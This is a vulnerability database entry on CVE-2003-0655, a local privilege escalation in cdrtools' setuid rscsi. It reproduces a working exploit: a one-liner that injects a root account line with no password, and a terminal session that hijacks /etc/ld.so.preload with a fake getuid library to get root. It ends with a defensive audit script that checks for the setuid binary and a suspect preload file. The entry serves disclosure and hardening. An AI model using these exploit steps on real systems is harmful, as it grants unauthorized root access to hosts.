cdrtools rscsi File Overwrite Vulnerability

Vulnerability ID: 1107436
Vulnerability type: Unknown
Published: 2003-08-01
Updated: 2003-08-27
CVE ID: CVE-2003-0655
CNNVD-ID: CNNVD-200308-192
Platform: Linux
CVSS score: 7.2
|Vulnerability Sources
https://www.exploit-db.com/exploits/22979
https://www.securityfocus.com/bid/87725
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200308-192
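|Vulnerability Details
rscsi in cdrtools 2.01 and earlier is vulnerable. A local user can overwrite arbitrary files and escalate privileges by specifying a target file as a command-line argument; that file is modified while rscsi is running with privileges.
|Exploit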
source: http://www.securityfocus.com/bid/8328/info

It has been reported that the rscsi utility may provide for the modification of ownership and the corruption of arbitrary attacker specified files. 

It has been reported that a local attacker may invoke the rscsi utility to corrupt or seize group ownership of an attacker specified file. Because the rscsi utility is installed with setuid 'root' permissions by default, a local attacker may harness this vulnerability to achieve elevated privileges.

$ echo C`echo -e "\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08r00t::0:0:root:/:/bin/bash\x0a"` | /opt/schily/sbin/rscsi /tmp/lala


[kf@vegeta kf]$ ls -al /etc/ld.so.preload
ls: /etc/ld.so.preload: No such file or directory
[kf@vegeta kf]$ cat > oops.c
int getuid(void)
{
return(0);
}
[kf@vegeta kf]$ gcc -c -o oops.o oops.c
[kf@vegeta kf]$ ld -shared -o oops.so oops.o
[kf@vegeta kf]$ ls -al oops.so
-rwxrwxr-x 1 kf kf 1714 Jul 30 18:53 oops.so
[kf@vegeta kf]$ echo duh_kf | /opt/schily/sbin/rscsi /etc/ld.so.preload
E0
Garbage command
0
-rw-rw-r-- 1 root kf 1 Jul 30 19:29 /etc/ld.so.preload
[kf@vegeta kf]$ echo /home/kf/oops.so > /etc/ld.so.preload
[kf@vegeta kf]$ su
[root@vegeta kf]# rm /etc/ld.so.preload
rm: remove regular file `/etc/ld.so.preload'? y
[root@vegeta kf]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
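
A host audit for the two conditions the transcript above relies on, a setuid rscsi binary and an `/etc/ld.so.preload` that is not exclusively root-controlled. This is an added example, not part of the original advisory; the two paths are the ones shown on this page, and the function names and the `RSCSI`/`PRELOAD` override variables are assumptions of this sketch.

```shell
#!/bin/sh
# Added audit example (not from the advisory). Default paths are the ones the
# page shows; override RSCSI for your distribution's install location.
RSCSI=${RSCSI:-/opt/schily/sbin/rscsi}
PRELOAD=${PRELOAD:-/etc/ld.so.preload}

# True if FILE is a regular file carrying the setuid bit.
has_setuid_bit() {
    [ -f "$1" ] && [ -u "$1" ]
}

# True if FILE exists and is not owned root:root, or is group- or
# world-writable. The transcript's "-rw-rw-r-- 1 root kf" entry matches on
# both the group-owner test and the group-write test.
preload_is_suspect() {
    [ -e "$1" ] || return 1
    [ -n "$(find -H "$1" -prune \( ! -user 0 -o ! -group 0 \
            -o -perm -020 -o -perm -002 \) -print 2>/dev/null)" ]
}

# Print one finding per check; always returns 0 so it can run under set -e.
audit() {
    if has_setuid_bit "$RSCSI"; then
        echo "WARN: $RSCSI is setuid; review whether it needs it (chmod u-s removes the bit)"
    else
        echo "ok: $RSCSI is absent or not setuid"
    fi
    if preload_is_suspect "$PRELOAD"; then
        echo "WARN: $PRELOAD has an unexpected owner, group or write bits:"
        ls -l "$PRELOAD"
    else
        echo "ok: $PRELOAD is absent or root:root without group/world write"
    fi
    return 0
}

audit
```
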
|Affected Products
CDRTools CDRTools 2.0.3

CDRTools CDRTools 2.0

|References

Source: www.secnetops.com
Link: http://www.secnetops.com/research/advisories/SRT2003-08-01-0126.txt
Source: BUGTRAQ
Name: 20030801SRT2003-08-01-0126-cdrtoolslocalrootexploit
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=105978381618095&w=2